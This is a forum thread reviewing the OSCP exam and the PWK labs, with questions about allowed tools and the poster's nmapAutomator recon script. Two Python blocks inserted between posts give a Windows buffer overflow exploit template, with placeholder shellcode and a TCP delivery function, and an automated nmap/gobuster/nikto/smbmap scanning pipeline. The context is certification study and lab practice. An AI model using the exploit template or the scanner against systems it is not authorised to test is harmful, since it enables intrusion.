OSCP Exam review "2019" + Notes & Gift inside!

@singham said:

Very good and guiding writeup. Great tool. I will try.
For OSCP, can Kali 2019.4 be used? If so, can updates be applied regularly, or do we have to use it without any updates?
What extra tools need to be installed in Kali?
I don't see this in any write-up, or I missed it.

I just took the exam on July 26th, and got confirmation that I passed 2 days ago. I can tell you that I did not use the Kali image that was provided to me for the PWK course. I used Kali 2019.2. I did apply some updates to it, and I installed some extra tools. Mostly these were tools and scripts that I discovered to help me attack boxes on HTB.

In reply to some of the things you said about no auto exploits, and anyone can chime in on this, does that include things like autoblue or things along those lines?

Hi, thank you so much for that detailed review.

I wanna ask about this BOF machine.

Does it have to be Windows, or can it be Linux also?

Thanks

@cspence10 said:
In reply to some of the things you said about no auto exploits, and anyone can chime in on this, does that include things like autoblue or things along those lines?

Basically any tool that does the exploitation for you is not allowed, apart from Metasploit, which is allowed on 1 machine only.

You mainly have to know how to find, edit, and use exploit scripts “in Python, C, PHP…etc”

@Tugzen said:
Hi, thank you so much for that detailed review.

I wanna ask about this BOF machine.

Does it have to be Windows, or can it be Linux also?

Thanks

Only Windows, similar to the demo shown on the OSCP course, and similar to the Windows machine you will receive with the course for BOF practice.

Just got here via another post, the tool is awesome! Thanks for developing it and releasing it for all of us to use

Can the nmapAutomator script be used in the exam?

It will be great if you can create a bit more detailed tutorial for nmapAutomator. I am sure I am missing something, as I cannot seem to understand what additional this script does other than running nmap. Sorry for my ignorance in advance, but any help will be highly appreciated.

@ALASNOT said:
Can the nmapAutomator script be used in the exam?

Of course… myself and so many others used it to great benefit.

@sultanrahi said:
It will be great if you can create a bit more detailed tutorial for nmapAutomator. I am sure I am missing something, as I cannot seem to understand what additional this script does other than running nmap. Sorry for my ignorance in advance, but any help will be highly appreciated.

There are different types of scans, and running it with ALL runs all scans.
The benefit is that it automates everything, including finding all possible ports and services and running recon on them, and finally finding potential vulnerabilities on them.

This is very beneficial when you run it in the background and go work on another machine, such that when you come back to it you’ll have all of the information ready for you, all fully automatically without needing any interaction from you.

@21y4d said:

@sultanrahi said:
It will be great if you can create a bit more detailed tutorial for nmapAutomator. I am sure I am missing something, as I cannot seem to understand what additional this script does other than running nmap. Sorry for my ignorance in advance, but any help will be highly appreciated.

There are different types of scans, and running it with ALL runs all scans.
The benefit is that it automates everything, including finding all possible ports and services and running recon on them, and finally finding potential vulnerabilities on them.

This is very beneficial when you run it in the background and go work on another machine, such that when you come back to it you’ll have all of the information ready for you, all fully automatically without needing any interaction from you.

I think for novices like me, it will be more beneficial if you can add some example outputs for the various input parameters, like the ones provided in the AutoRecon tool.

@sultanrahi said:
@21y4d said:

 > @sultanrahi said:
 > It will be great if you can create a bit more detailed tutorial for nmapAutomator. I am sure I am missing something, as I cannot seem to understand what additional this script does other than running nmap. Sorry for my ignorance in advance, but any help will be highly appreciated.

 There are different types of scans, and running it with ALL runs all scans.
 The benefit is that it automates everything, including finding all possible ports and services and running recon on them, and finally finding potential vulnerabilities on them.

 This is very beneficial when you run it in the background and go work on another machine, such that when you come back to it you'll have all of the information ready for you, all fully automatically without needing any interaction from you.

I think for novices like me, it will be more beneficial if you can add some example outputs for the various input parameters, like the ones provided in the AutoRecon tool.
GitHub - Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.

I’ve made the script stupid simple to use, so anyone can easily use it. It has only 7 modes “i.e. Basic, Recon, All”, all of which can be seen with -h.

If you’re not sure what to use, just run it with “./nmapAutomator xx.xx.xx.xx All” and you’ll get everything.

I hope I could help.

@21y4d said:

I’m glad you like it guys…

@achayan
Actually you forget about the proctor once you start focusing on the exam. You cannot see the proctor, as this would probably distract students, and would give a feeling that someone is watching you…
You can take short/long breaks whenever you need, you just need to inform the proctor before leaving and after returning, so that they make sure they can still see your screen and webcam before you start working again.

At the beginning of the exam you will need to show your ID and to give a webcam tour of the room you’re in, and you should be alone in the room. Also, after a long break “several hours” you will have to scan the room again, which takes around 30 seconds.

I guess I forgot to mention, but this was my only attempt at the exam. I’m pretty sure every attempt you would get different machines, as they have a big exam lab with so many machines you might get.

@21y4d Thank you for sharing this.

this is awesome stuff

I heard that sqlmap is not available… doesn’t that make some SQLi near-impossible manually? All the blind ones, where you would have to try true/false statements to find table names, etc.?

@lebutter said:
I heard that sqlmap is not available… doesn’t that make some SQLi near-impossible manually? All the blind ones, where you would have to try true/false statements to find table names, etc.?

SQLMap is not allowed. Blind SQLi is not required…
Blind SQLi is for OSWE… my review on it coming soon…

@21y4d said:

For the past couple of months, I have been away from HTB, as I have been working on the OSCP labs, as a preparation for my OSCP exam.
I have just finished my OSCP exam and got my certification, and thought I would write this review, especially for HTB members, from an HTB member perspective.

#PWK Lab

First off, I would like to review the PWK labs.

Before starting on the lab machines, I took 5 days to finish the PWK course materials, as there are some useful things here and there.

The PWK lab in general is very well designed and well structured. This means that the lab can accommodate both beginners and advanced users, and that beginners will have plenty of machines to learn on before starting on advanced machines.

I have finished all of the lab networks, except for the Admin network, which I could not find the key to unlock it even though I literally owned all other machines. The support was of no help as well, as always.

Most of the machines in the PWK lab “80%” are designed for beginners, and are directly exploitable. This gives beginners a lot of space to learn and improve their skills before going for more advanced machines.

As for the advanced machines, the ones worth mentioning are:
-Humble “Shell”
-Sufferance “Shell”
-Gh0st “Priv Esc”
-Observer “Shell”
-Alpha
-Joe
-Pain
-Ralph

The remaining machines were mostly directly exploitable with one exploit, and sometimes as a root/system user.

As for the other labs “IT & Dev”, only a couple of machines were directly exploitable, and all of the rest needed credentials found on post exploitation on other machines “i.e. in txt file, repeated user pass, golden ticket stealing, etc”. The useful thing from using these labs is having to learn pivoting properly, even though this is not required for the exam. I took this chance to write my personal instructions for pivoting using 5 different methods, in both port forwarding and dynamic forwarding.

You can find my pivoting notes here:
https://github.com/21y4d/Notes/blob/master/Pivoting.txt

My only negative take on the PWK lab machines is that they were getting outdated. This means dealing mostly with Windows XP, 2008, or RHEL 5 machines, which meant too many unintended exploits, making it difficult to guess which one was actually the intended way. I think the PWK lab might need an overhaul in the near future, otherwise they might become irrelevant to the real world.

#PWK Lab vs HTB Lab

As for the PWK lab from an HTB member perspective, I honestly thought the machines were relatively easy!

So that you get an idea of my experience at HTB before I started my OSCP labs, my ranking at HTB was “elite hacker”, I had 18/20 of the active machines, all of the retired machines, and the last machine I did was Sizzle, which was super fun.

The most difficult machines in the PWK lab were of a similar difficulty to a medium rated machine in HTB. The most challenging PWK machines “Sufferance, Gh0st, Observer”, were of a similar difficulty to machines like ■■■■■■■, Mirai, SolidState, Shocker, Frolic, and other similar machines at HTB.

The PWK machines were almost exclusively exploitable using exploits, with the occasional system misconfiguration. Even in my exam, almost all of the machines were exploitable using a public exploit, with some modifications.

The main reason behind this is that OffSec wants to make the lab like a real pen testing, which in this case they did a very good job, as real pen testing is mostly dealing with exploits.

However, I wish they added more advanced techniques that dealt with system misconfigurations, to teach people how to look for those as well. In a real pen test, if a machine and all of its components are fully patched, that only gives 50% of the security, as the other 50% comes from looking for misconfigurations to get access.

Finally, I think any Pro Hacker in HTB is more than ready to take the OSCP exam. However, I would still suggest taking the PWK lab, as there are some things to learn, as I will mention next.

#Proctored OSCP Exam

As for my exam experience, here’s how I did:

Owned machines: 5/5
Points collected: 100/100
Time taken: 10 hours
Report: 8 hours/50 pages
Exam attempts: 1

If you are comfortable enough with the level of machines I was explaining earlier, you should be able to take the OSCP exam. However, as I have stated before, there definitely are some skills that one needs to learn before taking the exam.

First off, the machines are definitely not the same level as the PWK lab, but more like the HTB machines I mentioned above, except for the 10 points one which is very straightforward.

The exam has several things that make it more challenging, and not only the difficulty of the machines in it.

  1. You have to really know how to handle your time properly. I think this is the main challenge in the OSCP exam. Rooting 5 “medium difficulty” machines in just 24 hours is no easy task, as it takes a lot of skill to be able to enumerate, adjust, and exploit all of these targets in just 24 hours, while having to take some time to rest and cool off. Honestly, I think if the machines were more advanced, or if the exam time was just 12 hours instead, very few people would be able to pass the exam. Which is why I think the exam time/difficulty were very well matched.

  2. Rabbit holes! If the PWK lab machines do not have many rabbit holes, the OSCP exam’s definitely do! I think all of the machines I had to exploit had rabbit holes “except for the BOF of course”. If you didn’t know how to deal with rabbit holes, you will waste your precious time without any progress. This was one of the things I had to teach myself before taking the OSCP exam, so I started a habit of writing a summary of findings as I was doing any machine. I simply write the attack surface and chance of exploitation, then I start from the top, and if one does not work for a while I move to the other. This tip will make your life much easier during your OSCP exam. There’s an excellent writeup by g0tmi1k for the Alpha machine in PWK forums, which teaches you how to do that.

  3. Reporting. While some might think that having to write a report after getting the needed points from the exam is unnecessary, I would say otherwise. Personally, I work in this field, and I know that any pen tester who does not know how to write a good report will not be useful for anyone. The companies do not want you to tell them that their machines are vulnerable, they want to know how exactly, so that they can not only patch the vulnerability, but also fix their design and way of thinking. Having said that, the OSCP exam report prepares you for such real life pen testing reports, as it gives you a template you can build upon, and start learning the design of such reports.

As for the proctoring part of the exam, even though you would not have the freedom of doing the machines as if you were alone “i.e. like in the lab”, since someone would be watching you all the time, I think this part was very necessary and well thought out by OffSec. This was just like when I took the PMP or CCNA exams, an online exam with someone proctoring you to prevent cheating. If you are not cheating, you have nothing to hide and should not have a problem with proctoring “cheating means someone else doing your work for you”. This will also give you credit for your efforts, and not have some people doubt that some OSCP holders might not have the skill.

The BOF machine was fairly similar to the example shown in the PWK course, which is basic Windows BOF, with nothing advanced “ASLR, DEP, x64…etc”.

It is a simple buffer overflow, requiring you to know three basic things:
1-Finding the length of the buffer
2-Finding bad characters
3-Finding a proper return address

You can find the python scripts I used with detailed instructions here:
Redacted

As for the use of Metasploit in the exam, I have always preferred not to use MSF unless it was necessary, as knowing how to manually exploit teaches you much much more. Even in the PWK lab, I didn’t use MSF at all, except for post exploitation enumeration, so it would be faster. However, in my exam, I did use MSF, because I faced an exploit I knew could only be done with MSF, as I have faced this exact vulnerability before here in one of the HTB boxes, and back then I tried everything without MSF “so did other people” and eventually I had to use MSF. This saved me a lot of time, since I already knew I had to use MSF here, and not waste my time trying to exploit it without it.

At the end, I think that the PWK lab does prepare you for a real pen test, and if you are OSCP certified, then you are definitely qualified to be a pen tester.

#My Gift for HTB Members

I hope you liked my review of the OSCP exam, and I have a gift for you.
During my PWK lab time, I wanted to improve my bash scripting skills. So, I wanted to automate all of the process of recon/enumeration that I run every time, and instead focus my attention on real pen testing.

I created a tool I called “nmapAutomator”, which is designed to run fully automatically with no interaction from your side whatsoever. If you choose the “All” option, and run the script for the target IP, I can assure you that you can leave the script running in the background, and if there’s anything nmap can tell you, you will find it. I tried to make it as efficient as possible, so that it would give accurate results as fast as possible. I even added automatic recon/enumeration to be run after that “i.e. gobuster, nikto, smbmap…etc”, based on the found ports.

I have tested this script on over 20 PWK lab machines, and I can say that 95% of the time if there’s something recon would tell you, you will find it here. I have not yet tested this script on HTB boxes, but I assume it would work just the same, as it should be universal.

Finally, I have used this script during my OSCP exam “which was the main reason I’ve written it”, and I can honestly say that this was one of the reasons I was able to finish all machines in 10 hours. This is simply because before starting any machine, I run this script with the “All” option on another machine, and by the time I go to that other machine, I would have a full recon report ready for me, instead of wasting an hour or so waiting for that. I did not have to run any other recon tool during my exam, as everything was automatically laid out by this script.

I hope you like it, and please feel free to share it or improve it.

You can get it and read more about it from the following GitHub link:
GitHub - 21y4d/nmapAutomator: A script that you can run in the background!

#Future Plans

Now that I have obtained my OSCP certification, I think I will directly go for OSCE, as I have been preparing for both together. For those who took it, how is it different from OSCP? What skills do I need before joining the CTP course and lab?

I also think I will take OSWE and OSEE after that, but we’ll see about that later.

Thanks a lot for taking the time to read my review.

My friend, thanks for your report. I am starting my studies in Cybersecurity and my goal is to take the OSCP and work with pentesting.

Your story filled me with joy and motivated me to try more, I want to tell you in a few months that I got OSCP.

It is a pity that I live in Brazil and the amount converted to my currency reaches more than 5 thousand reais.

I will study and add money to win this battle.

Success for you.
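The three steps listed in the review above (finding the buffer length, finding bad characters, finding a return address), worked through as an added Python example. This is not the redacted scripts from the post: the host, port, the "OVERFLOW1 " command prefix, the 0x625011AF JMP ESP address and the INT3 stub shellcode are placeholders, and simulate_dump() stands in for reading the stack back in the debugger.

```python
"""Windows stack overflow helpers for the three steps named above:
(1) buffer length, (2) bad characters, (3) return address.

Added example, not the redacted scripts from the post. The host, port,
"OVERFLOW1 " prefix, the 0x625011AF JMP ESP address and the INT3 stub
shellcode are placeholders; simulate_dump() stands in for reading the
stack back in the debugger.
"""
import socket
import string
import struct
from typing import Callable, Iterable, List, Optional


# --- Step 1: cyclic pattern (Metasploit style "Aa0Aa1Aa2...") and offset lookup

def pattern_create(length: int) -> bytes:
    """Upper/lower/digit triplets; every 4-byte window in the result is unique."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += f"{u}{l}{d}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is only unique up to 20280 bytes")


def pattern_offset(eip: int, length: int) -> Optional[int]:
    """EIP as shown by the debugger (e.g. 0x386F4337) -> byte offset into the pattern."""
    needle = struct.pack("<I", eip)   # x86 is little-endian: 0x386F4337 sits in memory as b"7Co8"
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


# --- Step 2: bad characters, found one per round by diffing what landed on the stack

def badchar_probe(exclude: Iterable[int] = ()) -> bytes:
    """Every byte 0x01..0xFF except those already known bad (0x00 is always excluded)."""
    skip = set(exclude) | {0x00}
    return bytes(b for b in range(1, 256) if b not in skip)


def first_bad_char(sent: bytes, dumped: bytes) -> Optional[int]:
    """First byte where the debugger dump diverges from what was sent, or None if clean."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def find_all_bad_chars(dump: Callable[[bytes], bytes], max_rounds: int = 16) -> List[int]:
    """Resend the probe, dropping each newly found bad char, until the dump matches."""
    bad = {0x00}
    for _ in range(max_rounds):
        probe = badchar_probe(bad)
        nxt = first_bad_char(probe, dump(probe))
        if nxt is None:
            return sorted(bad)
        bad.add(nxt)
    raise RuntimeError("still finding bad chars; check the target, not the byte set")


def simulate_dump(sent: bytes, truncating: Iterable[int]) -> bytes:
    """Constructed stand-in for the debugger: a bad byte cuts the copy short (zero-filled)."""
    cut = set(truncating)
    for i, b in enumerate(sent):
        if b in cut:
            return sent[:i] + b"\x00" * (len(sent) - i)
    return sent


# --- Step 3: assemble junk | EIP -> JMP ESP | NOP sled | shellcode

def build_payload(offset: int, ret_addr: int, shellcode: bytes, bad: Iterable[int],
                  nop_sled: int = 16) -> bytes:
    """Refuse to build if the return address, NOPs or shellcode contain a bad char."""
    badset = set(bad)
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("NOP sled", b"\x90"), ("shellcode", shellcode)):
        hit = badset & set(blob)
        if hit:
            raise ValueError(f"{name} contains bad char(s): {[hex(h) for h in sorted(hit)]}")
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def send_exploit(host: str, port: int, prefix: bytes, payload: bytes, timeout: float = 5.0) -> None:
    """Deliver prefix+payload over TCP (placeholder target; only called from main)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    offset = pattern_offset(0x386F4337, 3000)         # EIP seen after sending pattern_create(3000)
    bad = find_all_bad_chars(lambda p: simulate_dump(p, {0x0A, 0x0D}))
    payload = build_payload(offset, 0x625011AF, b"\xcc" * 4, bad)   # INT3 stub, not real shellcode
    print(f"offset={offset} bad={[hex(b) for b in bad]} payload={len(payload)} bytes")
    # send_exploit("10.10.10.5", 1337, b"OVERFLOW1 ", payload)  # placeholder host/port/prefix
```

Against a real target the dump callback is replaced by what you read back from the debugger after each send (a mona compare, or copying the bytes at ESP), and you repeat until the probe arrives intact. The return address check matters in practice: a JMP ESP found in a non-ASLR module is useless if any of its four bytes is one of the bad characters, so build_payload refuses it rather than sending a payload that silently stops working.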
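The scan pipeline described in the replies earlier in the thread (find all open ports, run recon on them, then look for vulnerabilities, all unattended in the background) and in the "All" mode description in the review, as an added Python example. It is not nmapAutomator's own code: the grepable nmap output is a constructed sample, and the service-to-tool mapping and the wordlist path are this example's assumptions.

```python
"""Three-stage recon pipeline in the style described above: full port sweep,
then a version/script scan on just the open ports, then per-service enumeration.

Added example, not nmapAutomator's own code. SAMPLE_GREPABLE is a constructed
`nmap -p- -oG -` result; the service-to-tool mapping and WORDLIST are assumptions.
"""
import re
import shlex
import subprocess
import sys
from typing import Dict, List, Optional, Tuple

WORDLIST = "/usr/share/wordlists/dirb/common.txt"   # assumed Kali path

# Constructed stand-in for `nmap -p- -oG - 10.10.10.5` output (not a real host).
SAMPLE_GREPABLE = (
    "# Nmap 7.80 scan initiated as: nmap -p- -oG - 10.10.10.5\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "8080/closed/tcp//http-proxy///\tIgnored State: closed (65530)\n"
    "# Nmap done at ...\n"
)

# Grepable port entry: port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/")


def open_ports(grepable: str) -> Dict[int, str]:
    """{port: nmap service name} for every TCP port reported open (filtered/closed dropped)."""
    found: Dict[int, str] = {}
    for line in grepable.splitlines():
        if "Ports:" not in line:
            continue
        for port, state, proto, _owner, service in PORT_RE.findall(line):
            if state == "open" and proto == "tcp":
                found[int(port)] = service
    return dict(sorted(found.items()))


def service_scan_cmd(target: str, ports: Dict[int, str]) -> List[str]:
    """Stage 2: -sV/-sC limited to the open ports, so it takes minutes rather than hours."""
    plist = ",".join(str(p) for p in ports)
    return ["nmap", "-sV", "-sC", "-p", plist, "-oN", f"{target}_services.nmap", target]


def recon_cmds(target: str, ports: Dict[int, str]) -> List[List[str]]:
    """Stage 3: choose enumeration tools from the service name (mapping is an assumption)."""
    cmds: List[List[str]] = []
    smb_queued = False
    for port, svc in ports.items():
        if svc.startswith("http") or port in (80, 443, 8080, 8443):
            scheme = "https" if svc in ("https", "ssl/http") or port in (443, 8443) else "http"
            url = f"{scheme}://{target}:{port}"
            cmds.append(["gobuster", "dir", "-u", url, "-w", WORDLIST,
                         "-o", f"{target}_{port}_gobuster.txt"])
            cmds.append(["nikto", "-h", url, "-output", f"{target}_{port}_nikto.txt"])
        elif (svc in ("microsoft-ds", "netbios-ssn") or port in (139, 445)) and not smb_queued:
            cmds.append(["smbmap", "-H", target])
            cmds.append(["enum4linux", "-a", target])
            smb_queued = True        # one SMB pass covers both 139 and 445
    return cmds


def plan(target: str, sweep_output: Optional[str] = None) -> Tuple[Dict[int, str], List[List[str]]]:
    """Run (or reuse) the stage-1 sweep; return open ports and every follow-up command."""
    if sweep_output is None:
        sweep_output = subprocess.run(
            ["nmap", "-p-", "--min-rate", "1000", "-oG", "-", target],
            capture_output=True, text=True, check=True).stdout
    ports = open_ports(sweep_output)
    if not ports:
        return ports, []
    return ports, [service_scan_cmd(target, ports)] + recon_cmds(target, ports)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real target: sweep, then execute each follow-up in turn (run it in the background).
        _, follow_ups = plan(sys.argv[1])
        for cmd in follow_ups:
            print("[+]", shlex.join(cmd))
            subprocess.run(cmd)
    else:
        # No argument: dry run on the constructed sample, touches no network.
        ports, follow_ups = plan("10.10.10.5", SAMPLE_GREPABLE)
        print("open:", ports)
        for cmd in follow_ups:
            print(shlex.join(cmd))
```

The point of splitting the work into a fast sweep followed by a targeted -sV/-sC scan is the same one the thread makes about running it in the background: the full 65535-port sweep with only a SYN probe finishes quickly, and the slow script scan then only touches the handful of ports that answered, so by the time you come back to the box the per-service output files are already there.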

@Gh0stBl4ck said:
My friend, thanks for your report. I am starting my studies in Cybersecurity and my goal is to take the OSCP and work with pentesting.

Wish you all the best!

Good and well structured review. It gave me confidence that once I get good at HTB I should feel prepared for taking the OSCP.

I have a question about the course I haven’t seen anywhere: are scripting and programming included in the course, considering you will need to modify existing exploits?

Also, the nmapAutomator is pure gold for a beginner like me, I really appreciate you creating it and releasing it to the public.

Wish you all the best!